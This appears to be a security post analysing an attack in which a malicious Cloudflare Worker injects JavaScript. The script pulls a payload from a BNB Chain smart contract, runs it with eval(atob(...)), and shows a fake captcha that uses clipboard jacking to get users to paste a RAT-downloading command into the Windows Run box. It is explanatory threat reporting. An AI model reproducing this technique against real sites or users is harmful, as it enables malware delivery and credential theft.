Here are the technical details for your convenience:
An attacker found a way to enter the Cloudflare management interface, which is used to protect websites, and by defining a new Worker in the interface, he’s injecting sophisticated Javascript code that is very difficult to detect.
This method is interesting because the code itself is compressed in a platform called BNB CHAIN
Why is BNB Chain used in the attack ❓
The script uses the Ethereum-compatible JSON-RPC API to make an “eth_call” call to a specific smart contract address (0x886d310Ac23e05EA705e24E513D19f53793832A9).
– The smart contract stores or encodes additional malicious data, which is dynamically retrieved when the code is run.
– The script decodes the payload and runs it in real-time with eval(atob(…)), which means that the malicious code is hidden within the blockchain itself 😈
– Using BNB Chain allows attackers to store malicious code on the blockchain instead of on a traditional server, making it difficult to detect and remove.
What happens next ❓
1. The code is loaded on every server (or domain) registered with Cloudflare
2. The code is added right after the Cloudflare <script>
3. A fake captcha is created that waits for a user to click (watering hole)
4. The user validates the captcha and a window immediately pops up asking the user to press the 🪟 key on the keyboard + the “R” character, which will activate the command prompt. The second request is to paste (press CTRL + V) into that command window and press ENTER.
5. The reason for the CTRL + V instruction is that the attacker is exploiting an attack called Clipboard Jacking. For example, using navigator.clipboard.writeText after clicking on the fake captcha can lead to the Clipboard being “fed” without the user actually pressing CTRL + C
6. The content from the Clipboard accesses the attack server and downloads RAT malware that apparently aims to continue stealing more and more passwords.
What do attackers will do with all these approaches ⁉️
One possible direction is selling access on Dark Forums. This is a very profitable method that allows attackers to make easy money. Once there is really no visible attack and no ransom or specific demand from the attacker, we can assume that this is an attempt to sell the hold to a third party (ransom group / interested party) if the hold is on a significant organization or a large number of websites.
Need help?
Talk to us in the comments if you have any more questions.